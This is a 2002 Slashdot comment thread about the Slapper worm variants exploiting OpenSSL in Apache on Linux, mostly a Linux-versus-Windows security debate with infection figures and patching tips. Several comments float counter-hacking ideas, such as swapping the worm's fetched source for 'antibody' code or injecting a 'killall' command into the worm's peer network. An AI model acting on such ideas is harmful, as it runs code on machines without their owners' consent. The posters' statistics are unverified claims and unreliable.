..and you forgot the most important part of the patch process: Pray, and Pray Again.
Re:We're not really catching up
by
micromoog
·
· Score: 2
Show me any legitimate resource that says something remotely close to "60% of all Internet-connected computers run Linux". That was your outrageous claim.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Dude, where have you been. To get my Nvidia drivers under Gentoo, I just type emerge nvidia-glx and emerge nvidia-kernel. If I install SuSE, it goes out and downloads them for me as well at the click of a button. With Windows, I open a browser and go hunt for the right ones then hope they install properly without my system becoming crippled (Don't laugh. It has happened to me.). Have you even worked on a Linux system?
By the way, tests have shown that the Nvidia drivers for Linux and native Linux games perform better than their Windows counterparts. Why are you clinging to that expensive, unreliable, monolithic, monopolistic dinosaur? Are you one of those "unbiased" Microsoft employees that lurks on Slashdot?
You know, Slashdot was so nice for the first three years before Microsoft users "discovered" it. Now they just moan about people being mean to them. Here's an idea. Start your own version of Slashdot. Why don't you run it on a Windows IIS system. That should be interesting.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Since we're namecalling, there is an apostrophe in the contraction "you're," if that's what you meant to type. Had you types it correctly, you'd still have misused it.
You're: Contraction for "you are."
Your: Possessive. Conveys ownership.
Example: You're a dolt, incapable of correctly utilizing your own language.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Two words. Anger Management. Sick Windows box keep you up all night?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
"It seems to me that Open Source bugs get fixed quicker"
Open source patches gets released quicker. For commercial software there is usually a rigorous regression testing progress that has to be adhered to, no matter how trivial the fix seems.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
IBM marketing flak with statistics done by IBM is hardly unbiased.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Okay, so there are 66% more Windows web servers (including desktop systems and some that had a web server installed by default without the owners knowledge) than Linux ones, and the worst Windows worm infected 40 times the number of systems as Slapper.
Also, Linux is more commonly used to host multiple sites than Windows for some reason.
Also, the last attrition.org web site defacement figures I saw (which admittedly was pre-Code Red) showed that well over 50% of defacements were on Windows systems although they had a smaller share of sites at the time than they do now. Now *that* *is* a figure that is directly related to the number of web sites. If you compromise one Linux/Apache server, you should be able to deface several sites, right? If you break into one Windows box, chances are you can only deface one web site, but something like 55-60% of the defacements were on Windows at a time they had much less than 50% share. Why is that?
Now of course the Morris worm was big back in the day, and that was all Unix before there were even many Windows systems on the Internet. Of course, that got fixed. Code Red is still bouncing around the Internet, and Dshield says 10,000 Windows systems are infected even as we speak. What was the last "big" Linux worm? Ramen? Lion? How many Linux systems were infected, and how many still are?
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
Had you types it correctly, you'd still have misused it.
Types: Plural, conveys many options Typed: Past tense, conveys an event in the past
Example: Had you taken the time, and correctly typed your response, you would not have looked like the idiot you are.
Re:We're not really catching up
by
TurdFurgeson
·
· Score: 0
Forest fires don't burn in the desert... If you know what I mean....
Re:We're not really catching up
by
JoFu
·
· Score: 1
I think another point to mention is that the fixes for this vuln were available before I even heard of the worm, which could be another significant reason for the lower amount of infections.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Yeah, no Open Source project would conceal a major bug for months, and continue to make at major releases without fixing it, until finally someone forces their hand by posting the details on BugTraq.
Re:We're not really catching up
by
orange7
·
· Score: 1
> Then I get to spend the rest of my time posting on >/. on how wrong you clueless Linux users are about > the state of the Windows world.... and rebooting machines.
A.
Re:We're not really catching up
by
Anonymous Coward
·
· Score: 0
You might wanna check your comma usage...;)
now are you two done with your little troll war now?
Re:We're not really catching up
by
cyberdog6
·
· Score: 1
i tried for a weekend to get XP to install drivers for my nVidia GeForce2 on an old Compaq. no deal.
Mandrake, saw it right away.
tried to install it on XP on a new PC i just got, it's a home built box with not the best of the best parts but decent, XP never would install on an NTFS partition. errored out with different errors every time.
i have no idea why, but finally for a laugh i installed it on on a FAT32 partition, and it installed with only a few errors.
Mandrake Linux went on with only one error the very first install on this box and runs perfectly.
you don't need to find drivers with Linux apparently, it finds them. even on a cobbled together box like mine.
if you realy want Unix stability and ease of use, along with drivers for everything, there is only one platform...Macintosh baby! If computer platforms are vampires, then Macintosh is the "Blade" of computer platforms.
All of the strengths, none of the weaknesses!
-- Evil is the money of all root....
Re:We're not really catching up
by
catfood
·
· Score: 2
Point taken.
But it was the openness of the source that made it possible for someone to do that forcing. It doesn't matter that 99.99% of users didn't notice the bug and didn't go through the source code to find it. What matters is that one hacker did and was able to isolate it because of the availability of source code.
Questions:
by
Black+Parrot
·
· Score: 2, Interesting
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
How many Apache exploits per IIS exploit?
What are the average turnaround times for security updates for Apache and IIS?
How much other stuff gets broken by an Apache update and a IIS update?
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
Interesting fun fact- almost 45% of you grabbing my mirror are using Windows:D (pssst. you can download from the lunix now, you don't have to download it with the Blue E and then WSFTP it up)
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
NOTE TO SELF: actually run vulnerability checker programs before posting mirrors to them on a public link to your own web server
-- slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
Re:mirror
by
Anonymous Coward
·
· Score: 0
some of us are using linux, but have our browsers report windows. this way we wont get pages saying: "this page requires ie version xxx. please upgrade your browsers to view the content". some of those people are also downloading to a samba share. then sshing to the box to run the stuff also:). then i'm part of the other 55% though.
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event. According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, proof two things:
a) The Linux world is susceptible to the same generic diseases b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
That said, I would like to see a more in-depth analysis of the proportions of machines which have been hit and are infected. Also, we should bear in mind that the impact is much less on linux as Apache normally runs as a non-root user while IIS almost always runs as a system/admin user.
I think the answer is simple, most using Apache know what they're doing and actually care about maintaining their web server. Most using IIS don't know what they're doing, nor do they care (until something like CodeRed happens).
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites.
It proves even less than that. There are two SSL add-ons for Apache, and only mod_ssl is vulnerable to the current Slapper variants (partly due to the fact it advertises the OpenSSL version). Apache-SSL sites are not presently being hit, but they could be.
It doesn't prove that much as there may be fewer Apache-SSL sites on linux than there are IIS sites. Code Red hit all IIS boxes, Slapper only hits Apache on linux, and even then, it requires the presence of gcc and some other conditions to be met before it works.
You say that like it's a bad thing.
But doesn't that speak to the resilience of the Open Source approach? The fact that you can run an Apache site without enabling or even installing SSL is a strength. AFAIK (and ICBW) you can't do that with IIS.
It shows that CodeReds growth was exponential at the critical time, which measured only a few hours. Days have passed since Slapper hit the 10k mark, and we haven't seen any considerably higher estimates.
Didn't they say code red hit 25,000 in the first day?
I'm all up for being fair, but move on folks, there really is nothing to see here.
-- ~Dalcius Rome wasn't burnt in a day.
Re:comparison
by
Anonymous Coward
·
· Score: 0
Care to back this up with something that you didn't just pull from your ass? No? Well, let me.
According to Netcraft, the estimated number of IIS servers around the time of the Code Red outbreak was around 8 million. The largest number for infected servers that I have seen thrown around is 350,000.
So, 8 million - 350,000 = most IIS admins *do* know what they are doing and they do care.
Re:Where's all the yammering now?
by
Anonymous Coward
·
· Score: 0
Yammer yammer yammer!
No wait! "Developers! Developers! Developers! Developers!" -- Steve "Monkey Boy" Balmer
Why the F___?
by
Anonymous Coward
·
· Score: 0
Why the F___ is this being called a LINUX worm, when in fact it is an SSL worm?
Lets just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
http://www.lwn.net/Articles/10026/
Thanks.
Re:Old news
by
Anonymous Coward
·
· Score: 0
Idiot, this story is about Slapper.B and Slapper.C, Slashdot ran the original slapper story weeks ago.
My first log entry on my home box (DSL) showing this came up Sep 12... So almost 2 weeks ago.
The entry is as follows: [Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):/
I've had a total of about 45 hits in the last 2 weeks, not like nimda at all in that regard (had to nuke my error logs like twice a week instead of once a month).
BWP (BTW, I'm running FreeBSD and no SSL so it's not that big a deal for me.)
Re:Old news
by
Anonymous Coward
·
· Score: 0
Good thing your not doing the news. This problem was addressed and patched over a month ago. While partly right with "over a week ago", it would be more correct to say "over a month ago"... helps make things seem... more right.
A Linux worm that started spreading a week ago has reached a plateau after infecting about 7,000 servers and turning the hosts into a peer-to-peer network that could be used to attack other computers.
Known as Linux.Slapper.Worm, Slapper and Apache/mod_ssl, the worm's spread has fallen far short of the biggest attackers in recent times. For example, Code Red infected 400,000 servers last summer. And according to the National Strategy to Secure Cyberspace, the Nimda virus compromised 86,000 systems last fall.
If these "new" worms exploit the same hole in OpenSSL, wouldn't one expect them to have a similarly low plateau? And for the record, exactly what configurations are vulnerable? If you have Apache compiled with mod_ssl, but don't do "apachectl startssl", are you vulnerable?
-- rooooar
Re:But...
by
Anonymous Coward
·
· Score: 0
Apache runs on almost any platform. I've installed Apache on a Windows XP machine just to see if it worked. Worked fine. Does that mean that Windows is also vulrerable to this problem, or does SSL with Apache only work on linux? If it works in Windows and infects Apache/SSL on windows... it would be more correct to title the article "New SSL Worm Found In The Wild".
Of course, from what I hear, the worm spreads by recompiling itself with gcc... which windows will just tell you "Bad command or file name"
Finally - Linux can be utilized as a Desktop OS!
by
Anonymous Coward
·
· Score: 0
No kidding! I was so glad to see that we get virii and worms, too. I mean, seriously. I was getting so tired of hearing my co-workers say "Hey, I've got the latest variation of the KleZ virus." "Oh yeah? Code red is still eating me alive!" As I just meekly stir my Dr. Pepper and saunter off...
Not anymore! I TOO am infected! HAHAHA!!! We can at last fully compete with the desktop market!
Oh wait... I guess it's a webserver virus, huh? Crap. Better luck next time, I guess.
Mod parent up! He/she may be right!
by
Anonymous Coward
·
· Score: 0
Welcome to the world of Microsoft
by
Anonymous Coward
·
· Score: 0
Got to love the buffer overflow... i will just laugh quitely while you patch your machines as you have done to me many times with iis...
Re:Welcome to the world of Microsoft
by
linuxrochester
·
· Score: 0
I hate Microsoft and especially IIS, but if I was a IIS admin, I would be lovin' this. Enjoy it while it lasts.:)
"Wget"ing its source
by
N+Monkey
·
· Score: 5, Interesting
From the article:
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
Re:"Wget"ing its source
by
bytesmythe
·
· Score: 3, Funny
For maximum benefit, the code should be something like:
if-down eth0
-- bytesmythe Hypocrisy is the resin that holds the plywood of society together. -- Scott Meyer
Re:"Wget"ing its source
by
glesga_kiss
·
· Score: 1
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
It would probably be illegal to do that as well. You are still running code and accessing someone elses machine without their consent.
If it were to do any damage to the system (easy if it were a non-standard setup), the poster of the antibody code would be liable.
Re:"Wget"ing its source
by
Anonymous Coward
·
· Score: 0
For example,
int main() {
execlp("apt-get", "update");
return 0; }
New Mac Users Should Take Note, Too
by
Spencerian
·
· Score: 2
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vunerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
-- Vos teneo officium eram periculosus ut vos recipero is.
A false sense of security
by
abhikhurana
·
· Score: 4, Interesting
I think that linux provides the sys admins with a false sense of security. Most sysadmins think that because running Linux, they can't be infected with any viruses and worms. The result of this is that many of hese adminstarators never bother to check about new threats, because they haven't seen anything like this for a while. Normally linux adminstrators are more tech savy than Windows adminstrators but as linx GUI improves, one will see a prliferation of not so tech savy adminstrators in the Linux market as well.So be prepared for increasing amounts of damage which such worms can cause. On the other hand, the adminstrators of Windows machines, because they are facing a new worm every second day, try to stay uptodate with the latest news and patches. Most of them have aautomatic update wizards running on their machines which download new patches instantly. Infact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system adminstrator is too lazy to check a news site, he will still come to know abot the threat. And because it will be running on linux, it will do what its supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
Re:A false sense of security
by
Winterblink
·
· Score: 3, Insightful
You know, I'm with you on this one. I know of friends who decided to jump on the Linux bandwagon, installed the OS and associated daemons and programs, had a fun time customizing their desktop, etc. Never put a single shred of time and effort into looking into any aspects of security. Asking them, the response was, nine times out of ten, "It's Linux man. Security out of the box." or something to that effect. These same people, myself included, when installing Windows head straight to the Control Panel and start deactivating nonessential services as one of the first steps. Subsequently, virus scanners, firewall software (ZoneAlarm, whatever), etc. Hell even my father hits WindowsUpdate and Norton LiveUpdate like it's a religion or something.
Good post man.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
Re:A false sense of security
by
sparkz
·
· Score: 2
For Windows Update to work, everything must be installed where MS expects it - if you moved IE to C:\Your Programs\Internet Exploiter\ then Windows Update wouldn't get it.
Similarly, for such a Linux tool to work, it would require that everything is installed in a particular, predictable way; this is how apt_get et. al work.
If you've installed Apache SSL into/usr/webserver/secure/featherything/indian/apache- with-modssl/ then no automatic update facility has a chance of finding it...
Re:A false sense of security
by
mcrbids
·
· Score: 2
There is!
1) (Debian) apt-get
2) (RedHat) up2date
3) (Gentoo) emerge
Other distros usually have something similar...
-- I have no problem with your religion until you decide it's reason to deprive others of the truth.
Re:A false sense of security
by
abhikhurana
·
· Score: 1
Well, that can be solved easily enough. All thats required is that when one installs an application, that application registers its path in a file and the automatic update uses this file to find the path for that particular application. Thats one idea. I am sure that there are many more out there.
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
sysadmins?
by
Shadestalker
·
· Score: 4, Insightful
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Comment removed
by
account_deleted
·
· Score: 4, Interesting
Comment removed based on user account deletion
I don't understand it.
by
Anonymous Coward
·
· Score: 0
If open source has tons of programmers around the world reviewing every piece of code, how is there a security vulnerability? Could it be that open and proprietary software SHARE some of the same problems? Nah. Couldn't be.
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reitterate their dogmatic belief:
Virus:= Bad
OpenSource:= Good
Microsoft:= Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
inconsistent Slashdot taxonomy
by
Anonymous Coward
·
· Score: 0
When OpenSSL was updated to include ECC, it was classifed as "BSD".
When OpenSSL design flaw opened a path for exploits it was classified as "Linux".
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
Time to chroot apache
by
Icy
·
· Score: 2, Informative
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse then having to reformat and reinstall the entire os because your are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are carefull about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
Re:Keep your anti virus software up to date also..
by
byran+lei
·
· Score: 0
>I find it somewhat odd that each advisory from an anti-virus vendor >concerning the slapper worm advises to not only patch your software, >but also keep your antivirus software current. >If the software is patched then antivirus software is irrelevent. >How big is the antivirus software market for linux? > > There isn't one and there still won't be one after this, because you don't need antivirus software to either detect or fix the problem. That's the big problem the anti-virus outfits are running into. The open source movement still doesn't need them.
At the risk of sounding stupid...
by
Anonymous Coward
·
· Score: 0
Upgrading OpenSSL isn't the only necessary step. I patched mine, and forgot to restart Apache -- and got hit by the "A" variant last week. Picked it up immediately, and removed it. Its pretty harmless as these things go, but it dawned on me when I cleaned it up and did a tripwire check to make sure nothing had changed that I hadn't restarted Apache when I upgraded the libraries.
Re:Finally - Linux can be utilized as a Desktop OS
by
Anonymous Coward
·
· Score: 0
Not to troll, but doesn't anybody see a big big problem?
Okay, so somebody out there is coding Worms especially for Linux. No problem, that was to be expected.
But the problem is this, the patch could be made by anyone, right? So this patch could also be infected or make thinks worse...
I myself NEVER check code on Linux, just because I can't code and don't want to... So I would download the patch and install it, but how can I be sure the patch isn't another Worm or Trojan?
I could wait for an "official" release by Suse, but hey... I want to patch this [fill new worm name her] worms threat as soon as possible, mainly BECAUSE I don't have a clue how it works...
Please don't reply with "Get A Clue" because that's for me (and I guess for a lot of people) no option...
Well if security of the patch is a concern, follow these simple rules. Make sure that the patch is digitally signed and verify the signature. Your only other recourse is to unplug your Webserver from the net and wait for Suse.
It's the job of the maintainers to ensure that patches are safe. I wouldn't advise downloading a random patch and applying it to your computer, but an "official" signed patch should have been reviewed and be safe to apply before Susy release a new binary.
From: Ron DuFresne [mailto:dufresne@winternet.com] Sent: Tuesday, September 24, 2002 9:54 AM To: firewalls@isc.org Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get on the ball and fully patch-up;
September 23 VNUNET.COM. A suspect has been arrested on suspicion of authoring the Slapper worm. But although the threat of the worm seems to have been short-lived, a new variant is already set to take up where its predecessor left off. Although the ISC's 'most attacked ports' chart no longer features Slapper in its Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has several subtle differences, but is for the most part an updated version of its predecessor. Both worms attempt to exploit a known vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants also carry the same payload, a password-protected backdoor and denial of service (DoS) capabilities. ISS's Morgan said that with the new variant on the loose his company had calculated that about 10,000 servers were probably now infected, and that the network was probably going to be used for DoS attacks. He added that it was unlikely the original author created the second worm. "It was significant that source code for the original Slapper was distributed within the computer underground immediately after the worm was detected in the wild," he said. Source: http://www.vnunet.com/News/1135274
-- "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
No, you are actually wrong on that. If you compare the number of IIS servers (they're all windos) and the number of Apache/Linux servers, then Apache/Linux is up front. Even if you double the number to account for people running IIS on their home-desktop, you get nowhere near the "infected-to-unaffected" ratio.
Remember that all the "95% market share" babble is about desktop systems, while both Slapper and CodeRed are targetting server systems, where windos is one among many, and by far not the leader.
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
-- Vintage computer games and RPG books available. Email me if you're interested.
Good point, and true. However, the difference is not an order of magnitude, and as such doesn't matter much. If Slapper has 2% or 5% of the CodeRed impact is not an issue. If it had 20% instead of 2%, it would.
You can find figures on SSL servers at netcraft, unfortunately only if you pay for their SSL report.
Heh, so is this a valid statement then?
"A Slapper Slapped Her Slapper!"
--
"Hell hath no fury like a woman scorned for SEGA...."
On Onions and Carrots
by
Ektanoor
·
· Score: 4, Insightful
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearence I had more then 340000 Nimda "visits" on the network I surpervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Re:On Onions and Carrots
by
jmcnamera
·
· Score: 1
You said
"It is far from its Windows cousins, not only in terms of infected machines but also in attacks."
Are you implying that Window's hackers write better (more destructive) worms than Linux hackers? You should be cast into the void for implying they are better than we, the pure and righteous.
-- this is not a sig
Re:On Onions and Carrots
by
Anonymous Coward
·
· Score: 1, Insightful
You, like most of the other Linux apologists on here, seem to be missing the point. I haven't seen anyone trying to the make the argument that this worm is anywhere near the scale of Code Red/Nimda. What I have seen is a lot of people trying to point out the big hole this blows in the Open Source/Linux mythology.
How many times have we heard that Linux is more secure, Linux admins are just better, Open Source programmers fix problems fast? How many times have we heard, in fact, that nothing like this could happen on Linux? This worm proves otherwise and that is the important point.
Re:On Onions and Carrots
by
Anonymous Coward
·
· Score: 0
How many times have we heard that Linux is more secure,
It _is_ more secure. You say so yourself:
I haven't seen anyone trying to the make the argument that this worm is anywhere near the scale of Code Red/Nimda.
By virtue of the fact that is nowhere near the scale of the atrocity of those two worms, you admit that Linux is more secure.
Linux admins are just better,
There is no direct evidence to support this, but the simple fact that only 11,000 - 15,000 have been infected means that Linux admins are appearently good at patching their systems. Therefore, better.
Open Source programmers fix problems fast?
This vulnerability has been known about and fixed for months. Months. Before there was even the first Slapper virus. That sure seems fast to me, if a patch is produced before there is a known problem.
How many times have we heard, in fact, that nothing like this could happen on Linux?
No one I know has ever said this. You are quite right; if someone said that, they are blowing it out their ass. Even so, Linux is simply inherently more secure than Windows will ever likely be.
Re:On Onions and Carrots
by
Anonymous Coward
·
· Score: 0
How many times have we heard that Linux is more secure,
It _is_ more secure. You say so yourself:
I haven't seen anyone trying to the make the argument that this worm is anywhere near the scale of Code Red/Nimda.
By virtue of the fact that is nowhere near the scale of the atrocity of those two worms, you admit that Linux is more secure.
Wrong. What I said was that the Slapper outbreak is on a much smaller scale than Code Red, nothing about relative security. In fact (once again), the fix for Code Red was out at least a month before the virus was spotted in the wild. Code Red was due more to lazy/incompetent admins than lack of security.
Linux admins are just better,
There is no direct evidence to support this, but the simple fact that only 11,000 - 15,000 have been infected means that Linux admins are appearently good at patching their systems. Therefore, better.
This doesn't prove that at all since absolute numbers usually don't provide a clear picture when they aren't placed in the proper context. To use Code Red as an example, people here often throw around the 350000 server number to make IIS look bad. And it does look bad. But consider that at the time of the outbreak, there were approximately 8 million IIS servers on the internet (according to Netcraft). That comes out to about a 4% infection rate. Suddenly it doesn't sound as bad. By the same token, if you want to know the true extent of Slapper, you need to know how many Apache installations run on Windows compared to *nix, and how many of those *nix installations also use OpenSSL. I'm sure that Linux/Apache still comes out better when those considerations are taken into account, but the point remains that you can't infer that just from those numbers.
Open Source programmers fix problems fast?
This vulnerability has been known about and fixed for months. Months. Before there was even the first Slapper virus. That sure seems fast to me, if a patch is produced before there is a known problem.
So what? As I said, a patch for Code Red/Nimda was out way before the worms hit. In my experience, most MS patches are released before some cracker comes up with an exploit.
How many times have we heard, in fact, that nothing like this could happen on Linux?
No one I know has ever said this. You are quite right; if someone said that, they are blowing it out their ass. Even so, Linux is simply inherently more secure than Windows will ever likely be.
Really? Because I see that statement made just about every time one of these discussions happens. I'm sure it's just some vocal minority of clueless wannabes, but as with most such groups they give outsiders the impression that they speak for the whole community. I don't mind calling out lazy/incompetent Windows admins because these people make me look bad. The/. community should take this kind attitude with its own members. As for Linux being more inherently secure than Windows, I'll give you that one. But then, I never argued against it in the first place.
Retarded:A few hopes...
by
aphor
·
· Score: 3, Insightful
Let me explain the process. You tell me if the analogy fits.
robber:
You have a serious bug that can compromise a lot of running systems.
OpenSSL:
Oh really?
robber:
I'm serious. Here's how to exploit it, and here's a patch. I demand you fix it.
OpenSSL:
Let me have a look at that... We promise we'll fix it.
robber:
Well, I found it on accident, but it only took me a few hours to write the exploit and the patch. It shouldn't take more than a day or so to get the fix out.
OpenSSL:
We will update our code and send out a patch notice, but it's up to the users to upgrade on their own...
robber:
To give your notice some teeth, I'm going to post the worm to Usenet in 30 days if nobody beats me to it.
The original had an 'execute local command' option, and some wise bugtraq reader (no, it wasn't me:) noticed that one could inject 'killall -9.bugtraq' into the infection network, to shut it down.
Or failing that, one might write a wee proggie to sit on UDP port 2002, and reply to any connections with this command. One would, of course, run this on an isolated machine...
Re:Source Code?
by
whovian
·
· Score: 3, Informative
one might write a wee proggie to sit on UDP port 2002,
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
-- To-do List: Receive telemarketing call during a tornado warning. Check.
mv /usr/bin/gcc /usr/bin/gcc-backup
by
ylikone
·
· Score: 1
Wouldn't moving the/usr/bin/gcc command to a backup file stop these worms from spreading? Move it back only temporarily when you need to "make" something.
-- Meh.
Slapper: The threat that wasn't?
by
Andy+Dodd
·
· Score: 2, Insightful
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
-- retrorocket.o not found, launch anyway?
The difference is not so clear
by
FallLine
·
· Score: 2
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories)
chkvulnerability?
by
Anonymous Coward
·
· Score: 0
Is there something that will check a system for _vulnerability_ as opposed to just if it's infected?
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Sysadmins just put an apt-get update in their list of cron jobs. I'm sure it'll save them time by not having to constantly check for security holes, etc online.
The job of the sysadmin is to stay on top of what is being revealed as vulnerable and then to act appropriately so as to mitigate risk. Updating packages automatically isn't doing that - what if the repository that apt is hitting has been compromised? What if the new version of package X has other issues that make it less than optimal?
One does not approach being secure by putting one's faith in some tool and hoping it solves everything. The only way to lock down a box is to be vigilant and aware, in my experience.
The problem isn't not having packages automatically updated, but rather that there are sysadmins who are militantly unaware of disclosed vulnerabilities in the software they run. Solve the latter and you don't need the (somewhat short-sighted) former.
-- We who were living are now dying
With a little patience
Re:Slapper: The threat that wasn't?
by
Dionysus
·
· Score: 2, Informative
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
-- Je ne parle pas francais.
If you're an admin...
by
otis+wildflower
·
· Score: 2, Insightful
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
I've never understood...
by
HarryLeBlanc
·
· Score: 0, Offtopic
...why buffer overflow viruses are such a common vulnerability in software. Yes, I grok how they work, but their effectiveness depends on knowing in advance exactly how big the buffer is.
It would be trivially easy to write a function to randomly assign buffersize based on parameters (say, min max and optimal size), and even change its size periodically at runtime. That would eliminate this entire class of attack.
Is my Linux/PPC box safe?
by
Anonymous Coward
·
· Score: 0
Correct me if I'm wrong but these Slapper viruses only infect ix86 Linux distributions. Since it is a buffer overflow attack the code that overflows must be platform specific. In which case my PowerPC machines are safe from this round of viruses as the virus can only infect ix86 machines.
Equality
by
Anonymous Coward
·
· Score: 0
"Windows Admin with Thumb Up Butt" == "Linux Admin with Thumb Up Butt" == "No Admin At All"
Watch for trojans! Use your own binaries!
by
Wee
·
· Score: 3, Informative
